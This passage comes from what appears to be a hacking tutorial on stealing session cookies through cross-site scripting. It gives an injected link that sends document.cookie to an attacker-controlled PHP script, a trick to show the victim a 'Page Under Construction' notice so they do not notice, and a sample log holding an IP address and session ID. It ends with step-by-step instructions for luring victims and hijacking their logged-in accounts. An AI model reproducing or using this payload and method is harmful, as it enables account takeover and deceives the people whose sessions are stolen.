"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>

This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this:

Code:



logData(); 
?>

to this:

Code:



logData();


echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

Code:



IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php |  


DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Summary

So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.